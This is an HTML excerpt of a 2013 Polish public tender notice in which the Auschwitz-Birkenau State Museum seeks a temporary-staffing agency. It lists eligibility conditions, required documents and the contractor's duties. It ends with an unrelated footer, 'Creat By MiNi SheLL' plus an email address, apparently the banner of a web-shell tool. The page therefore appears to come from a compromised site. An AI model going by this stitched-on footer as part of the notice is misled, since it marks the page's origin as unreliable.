<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że posiada wpis do rejestru podmiotów prowadzących agencje zatrudnienia zgodnie z przepisami ustawy z dnia 20 kwietnia  2004 roku o promocji zatrudnienia i instytucjach rynku pracy (tj. Dz. U. z 2008 r. nr 69, poz. 415 tj. z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał  należycie  w okresie  ostatnich trzech lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym  okresie co najmniej dwóch usług, z których: 
a) co najmniej  jedna usługa (zamówienie)  dotyczyła zapewnienia co najmniej 14 pracowników tymczasowych innemu Zamawiającemu co miesiąc  przez okres co najmniej 6 miesięcy,
b) co najmniej jedna usługa (zamówienie) polegała na zapewnieniu pracowników tymczasowych innemu Zamawiającemu, której wartość brutto wyniosła nie mniej niż 350 000 zł.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada:
a) ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia tj. działalności agencji pracy tymczasowej na kwotę  co najmniej 350.000 zł,
b) środki finansowe lub zdolność kredytową w wysokości 50.000 zł,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Na potwierdzenie braku podstaw do wykluczenia  z postepowania w związku z okolicznością o której mowa  w  art. 25 ust. 2 pkt 5 ustawy Pzp Wykonawca składa listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp, albo informację o tym, że nie należy do grupy kapitałowej - załącznik nr 4 do SIWZ.
2. Formularz ofertowy - załącznik nr 1 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.auschwitz.org<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PAŃSTWOWE MUZEUM AUSCHWITZ-BIRKENAU w OŚWIĘCIMIU 
ul. Więźniów Oświęcimia 20, 32- 603 Oświęcim..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2013 godzina 12:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego, w Oświęcimiu, ul. Więźniów Oświęcimia 20, budynek administracyjny, biuro podawcze - parter, pokój nr 1.8..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I. W postępowaniu mogą wziąć udział Wykonawcy, którzy nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 2 pkt 5 ustawy Pzp.   
Na potwierdzenie braku podstaw do wykluczenia  z postepowania w związku z okolicznością o której mowa  w  art. 25 ust. 2 pkt 5 ustawy Pzp Wykonawca składa listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp, albo informację o tym, że nie należy do grupy kapitałowej - załącznik nr 4 do SIWZ.

II. W ramach realizacji przedmiotu zamówienia do obowiązków Wykonawcy należeć będzie:
a) dokonywanie wszelkich czynności związanych z zatrudnieniem pracowników tymczasowych wynikających z obowiązujących przepisów prawa,
b) w przypadku pracowników ogólnobudowlanych, Zamawiający nie dysponuje osobami, które spełniają wymagane kwalifikacje, dlatego też wymaga od Wykonawcy przeprowadzenia rekrutacji i selekcji kandydatów na pracowników tymczasowych zgodnie z wymaganiami Zamawiającego (tj. określenie wymagań wobec  przyszłych pracowników tymczasowych, opracowanie strategii poszukiwań, poszukiwanie kandydatów na pracowników tymczasowych, sprawdzenie dokumentów, przedstawienie listy kandydatów na pracowników tymczasowych po dwóch kandydatów na poszczególne  stanowiska -  do wyboru przez Zamawiającego). 
Zamawiający osobiście dokona ostatecznego wyboru pracowników na podstawie przeprowadzonych rozmów kwalifikacyjnych z zaproponowanymi przez  Wykonawcę kandydatami.
W przypadków pracowników obsługi odwiedzających muzeum i pracowników administracyjnych, Zamawiający dysponuje osobami, które będą zatrudnione na w/w stanowiskach pracy.
c) zatrudnienie pracowników tymczasowych po akceptacji przez Zamawiającego i  zawarcie z nimi umów o pracę na okres jednego miesiąca kalendarzowego,
d) oddanie do dyspozycji Zamawiającego pracowników tymczasowych gotowych do świadczenia pracy w terminie od dnia 01 kwietnia 2013 r.
e) przeprowadzenie badań lekarskich zatrudnionych pracowników tymczasowych z uwzględnieniem zakresu obowiązków  a po stwierdzeniu przez lekarza medycyny pracy, obowiązku pracy w okularach lub szkłach kontaktowych podczas pracy przy monitorze ekranowym - refundacja w kwocie 100 zł po okazaniu przez pracownika tymczasowego faktury zakupowej.
f) koordynowanie realizacji przedmiotu zamówienia przez wyznaczonego pracownika Wykonawcy dostępnego dla Zamawiającego od poniedziałku do piątku w godzinach 7:00 do 18:00,
g) zapewnienie zastępstwa za zatrudnionego pracownika tymczasowego w przypadku jego usprawiedliwionej nieobecności trwającej dłużej niż 14 dni w ciągu 48 h od zgłoszenia takiego zapotrzebowania przez Zamawiającego,
h) zapewnienie zmiany zatrudnionego pracownika tymczasowego w uzasadnionych przypadkach, w szczególności: niewłaściwego świadczenia pracy przez niego, rezygnacji z zatrudnienia, porzucenia miejsca pracy,  w ciągu 48 h od zgłoszenia takiego zapotrzebowania przez Zamawiającego,
i) zawarcie  z pracownikami tymczasowymi zatrudnionymi na stanowisku kasjera umów o odpowiedzialności za powierzone mienie zgodnie z art. 124 Kodeksu Pracy, 
j) zachowanie poufności informacji powziętych  podczas realizacji przedmiotu zamówienia zgodnie z przepisami prawa,
k) wystawianie co miesiąc, ze względu na źródło finansowania, dwóch odrębnych faktur: jednej dotyczącej  9 pracowników  obsługi odwiedzających Muzeum i 	2 pracowników administracyjnych oraz drugiej dotyczącej 	3 pracowników ogólnobudowlanych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com